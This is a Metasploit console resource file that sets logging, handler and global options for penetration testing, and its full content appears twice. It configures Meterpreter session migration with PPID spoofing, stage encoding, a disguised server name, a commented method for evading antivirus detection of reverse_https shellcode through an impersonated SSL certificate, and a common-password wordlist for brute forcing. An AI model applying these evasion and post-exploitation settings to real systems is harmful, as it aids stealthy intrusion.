ricardojba/msfconsole.rc

## msfconsole.rc
set LogLevel 5
set ConsoleLogging true
set SessionLogging true
set TimestampOutput true
features set dns_feature true
features set postgres_session_type true
features set mssql_session_type true
features set mysql_session_type true
features set wrapped_tables true
features set fully_interactive_shells true
features set datastore_fallbacks true
features set metasploit_payload_warnings true
# features set defer_module_loads true
features set hierarchical_search_table true
# set HTTPTrace true
# spool /home/vibrio/.msf4/all_output.txt
# load sounds verbose=true
# migrate and perform PPID Spoofing
setg autorunscript post/windows/manage/migrate PPID_NAME="explorer.exe"
setg PrependMigrate true
setg VERBOSE true
setg THREADS 50
setg EXITFUNC thread
setg ABORT_ON_LOCKOUT true
setg cmdstager::ssl true
setg MeterpreterServerName "Microsoft-HTTPAPI/2.0"
setg EnableContextEncoding true
setg EnableStageEncoding true
setg ExitOnSession false
# https://niiconsulting.com/checkmate/2018/06/bypassing-detection-for-a-reverse-meterpreter-shell/
# Symantec and other detect the SSL certificate of the reverse_https shellcode.
# Use auxiliary/gather/impersonate_ssl and then use the impersonated certificate on the reverse_https shellcode by using the options handlersslcert and stagerverifysslcert
setg handlersslcert /home/vibrio/.msf4/loot/20210921081839_default_173.194.76.99_173.194.76.99_pe_946125.pem
setg stagerverifysslcert true
# set ReverseListenerBindAddress 192.168.1.1
# set ReverseListenerBindPort 4444
# set Proxies http:127.0.0.1:8080  # HTTP Proxy
# set Proxies socks:127.0.0.1:9050 # SOCKS Proxy
# set Proxies ni:192.168.1.1:3299  # SAP Router
setg SHODAN_APIKEY foooooooooooooooooooooooooooo
setg SRVHOST 0.0.0.0
setg SRVPORT 5555
setg LHOST 1.1.1.1
setg LPORT 4444
setg DB_ALL_PASS true
setg DB_ALL_USER true
setg USE_WINDOWS_AUTHENT false
setg PASS_FILE ~/SecLists/Passwords/Common-Credentials/best1050.txt
# db_connect -y ~/.msf4/database.yml
# %D = Current local directory
# %H = Host name
# %J = Current number of jobs running
# %L = Local IP
# %S = Currently number of sessions open
# %T = Timestamp
# %U = Username
set PROMPT %red[LHOST:%L]%whi[Workspace:%W]%blu[Jobs:%J]%grn[Sessions:%S]%yel[%D]
	set LogLevel 5
	set ConsoleLogging true
	set SessionLogging true
	set TimestampOutput true
	features set dns_feature true
	features set postgres_session_type true
	features set mssql_session_type true
	features set mysql_session_type true
	features set wrapped_tables true
	features set fully_interactive_shells true
	features set datastore_fallbacks true
	features set metasploit_payload_warnings true
	# features set defer_module_loads true
	features set hierarchical_search_table true
	# set HTTPTrace true
	# spool /home/vibrio/.msf4/all_output.txt
	# load sounds verbose=true
	# migrate and perform PPID Spoofing
	setg autorunscript post/windows/manage/migrate PPID_NAME="explorer.exe"
	setg PrependMigrate true
	setg VERBOSE true
	setg THREADS 50
	setg EXITFUNC thread
	setg ABORT_ON_LOCKOUT true
	setg cmdstager::ssl true
	setg MeterpreterServerName "Microsoft-HTTPAPI/2.0"
	setg EnableContextEncoding true
	setg EnableStageEncoding true
	setg ExitOnSession false
	# https://niiconsulting.com/checkmate/2018/06/bypassing-detection-for-a-reverse-meterpreter-shell/
	# Symantec and other detect the SSL certificate of the reverse_https shellcode.
	# Use auxiliary/gather/impersonate_ssl and then use the impersonated certificate on the reverse_https shellcode by using the options handlersslcert and stagerverifysslcert
	setg handlersslcert /home/vibrio/.msf4/loot/20210921081839_default_173.194.76.99_173.194.76.99_pe_946125.pem
	setg stagerverifysslcert true
	# set ReverseListenerBindAddress 192.168.1.1
	# set ReverseListenerBindPort 4444
	# set Proxies http:127.0.0.1:8080 # HTTP Proxy
	# set Proxies socks:127.0.0.1:9050 # SOCKS Proxy
	# set Proxies ni:192.168.1.1:3299 # SAP Router
	setg SHODAN_APIKEY foooooooooooooooooooooooooooo
	setg SRVHOST 0.0.0.0
	setg SRVPORT 5555
	setg LHOST 1.1.1.1
	setg LPORT 4444
	setg DB_ALL_PASS true
	setg DB_ALL_USER true
	setg USE_WINDOWS_AUTHENT false
	setg PASS_FILE ~/SecLists/Passwords/Common-Credentials/best1050.txt
	# db_connect -y ~/.msf4/database.yml
	# %D = Current local directory
	# %H = Host name
	# %J = Current number of jobs running
	# %L = Local IP
	# %S = Currently number of sessions open
	# %T = Timestamp
	# %U = Username
	set PROMPT %red[LHOST:%L]%whi[Workspace:%W]%blu[Jobs:%J]%grn[Sessions:%S]%yel[%D]